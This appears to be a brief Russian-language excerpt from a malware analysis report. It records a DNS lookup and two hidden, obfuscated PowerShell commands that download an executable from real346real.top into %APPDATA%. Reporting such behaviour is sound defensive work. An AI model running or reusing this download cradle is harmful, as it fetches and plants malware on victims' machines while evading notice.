Техническая информация
- http://real346real.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwERShell.exe -exEcuTiONPoliCY BYPasS -noPRoFILE -windowSTyLE HIDdEN (NeW-objEcT SySTeM.net.WebCLIent).DOwnLOadfile('http://real346real.top/search.php','%APPdaTa%.exE')...
- DNS ASK re###46real.top
- '<SYSTEM32>\cmd.exe' /c "pOwERShell.exe -exEcuTiONPoliCY BYPasS -noPRoFILE -windowSTyLE HIDdEN (NeW-objEcT SySTeM.net.WebCLIent).DOwnLOadfile('http://real346real.top/search.php','%APPdaTa%.exE')...' (со скрытым окном)